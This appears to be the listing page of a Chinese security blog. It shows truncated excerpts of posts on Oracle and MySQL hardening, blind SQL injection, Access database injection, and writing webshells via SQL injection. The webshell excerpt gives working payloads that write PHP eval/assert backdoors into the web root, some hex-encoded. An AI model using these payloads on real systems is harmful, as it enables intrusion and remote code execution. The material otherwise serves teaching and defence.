2022-01-20 Oracle基线加固 Oracle基线加固 账号权限加固限制应用用户在数据库的权限•1.查看权限 SQL>SELECT * FROM dba_sys_privs WHERE grantee=; – 系统权限 SQL>SELECT * FROM dba_tab_privs WHERE grantee=; – 对象权限 SQL>SELECT * FROM dba_role_privs WHERE grantee=; --赋予的角色 •2.收回相应权限(例如收回 select any table 权限) SQL>REVOKE select any table FROM ; •3.收回应用用户的 DBA 角色 SQL>REVOKE dba FROM ;撤消 public 角色的程序包执行权限•1.查看 public 角色的程序包执行权限 SQL>SELECT table_name FROM dba_tab_privs WHERE grantee=‘PUBLIC’ and privilege=‘EXECUTE’; •2.撤销 public 角色的程序包执行权限(例如撤销在 u... admin 2022-01-20 基线加固,安全服务 1,253 阅读 1 评论 2022年01月20日 1,253 阅读 1 评论
2022-01-13 Mysql基线加固 Mysql基线加固 操作系统方面指定用户运行进程禁用操作记录文件非web区域文件权限日志文件权限数据目录datadirchmod 700 chown mysql:mysql 二进制日志log_bin_basename错误日志log_error慢查询日志slow_query通用日志general_log_file审计日志audit_log_file通用安全删除test数据库读取本地文件的参数local_infilemysql配置文件中新增一行:Local-infile=0;数据库权限加固REVOKE 权限回收访问数据库账号权限限制非管理员用户的权限控制DML/DDL操作授权加固审计和日志错误日志审计log_error存放在非系统区域关闭原始明文日志Log-raw = OFF认证加固Old_password环境变量,确保返回值不为1(hash暴力破解)禁止非空密码登录删除空账号 admin 2022-01-13 基线加固,安全服务 1,643 阅读 0 评论 2022年01月13日 1,643 阅读 0 评论
2022-01-07 盲注详解 盲注详解 {lamp/}盲注SQL注入类型布尔型盲注时间延迟型盲注报错型盲注其他报错函数DNSlog快速注入{lamp/} 一、布尔盲注“布尔盲注”又称布尔判断,指的是利用SQL语句逻辑与(and)操作,判断and两边的条件是否成立,SQL语句带入数据库查询后判断返回内容(通常返回值仅有非空和空两种状态),类似布尔型的true和false的两种状态;看具体函数使用,要求必须掌握left、substr、ascii、regexp、like函数用法;▲left(user())>’10’ user()显示当前数据库用户,length统计字符长度。示例:http://127.0.0.1/sqli-labs/Less-8/?id=1' and length(user())>20 --+http://127.0.0.1/sqli-labs/Less-8/?id=1' and length(user())=14 --+▲left(user(),1)>’s’ //left()函数user()显示当前数据库用户,le... admin 2022-01-07 WEB漏洞,SQL注入 2,191 阅读 2 评论 2022年01月07日 2,191 阅读 2 评论
2022-01-01 其他数据库注入 其他数据库注入 {lamp/}Access数据库注入Microsoft Office Access 是由微软发布的关系数据库管理系统。小巧而灵活,是Windows下小型C/S系统和网站B/S不错的选择。Access的用途体现在两个方面:一、用来进行数据分析: Access有强大的数据处理、统计分析能力,利用access的查询功能,可以方便地进行各类汇总、平均等统计;二、用来开发软件: Access用来开发软件,比如生产管理、销售管理、库存管理等各类企业管理软件,在开发一些小型网站WEB应用程序时,用来存储数据。例如ASP+Access判断数据库类型根据url的后缀。ASP为后缀名的是ACCESS数据库在url后面加单引号,以报错信息“Microsoft ole db provider for odbc drivers”判断为access通过and (select count(*) from msysobjects)>0发生错误页面则为access数据库。msysobjects、msysqueries\msysrelationships为access的三个系统表,web环境下没有权限... admin 2022-01-01 WEB漏洞,SQL注入 1,245 阅读 0 评论 2022年01月01日 1,245 阅读 0 评论
2021-12-24 SQL注入写webshell SQL注入写webshell 一、MySQL写shell写入WebShell的几种方式1、利用Union select 写入需要满足的条件对web目录有写权限GPC关闭(GPC:是否对单引号转义)有绝对路径(读文件可以不用,写文件需要)没有配置secure-file-priv?id=1 union select '<?php assert($_POST["cmd"]);?>’ into outfile 'D:/WWW/evil.php' ?id=1 union select 1,"<?php @eval($_POST['g']);?>",3 into outfile 'D:/WWW/evil.php' ?id=1 union select 1,0x223c3f70687020406576616c28245f504f53545b2767275d293b3f3e22,3 into outfile "D:/WWW/evil.php"2、利用分隔符写入?id=1 into outfile 'D:/WWW/evil.php' fie... admin 2021-12-24 WEB漏洞,SQL注入 2,329 阅读 0 评论 2021年12月24日 2,329 阅读 0 评论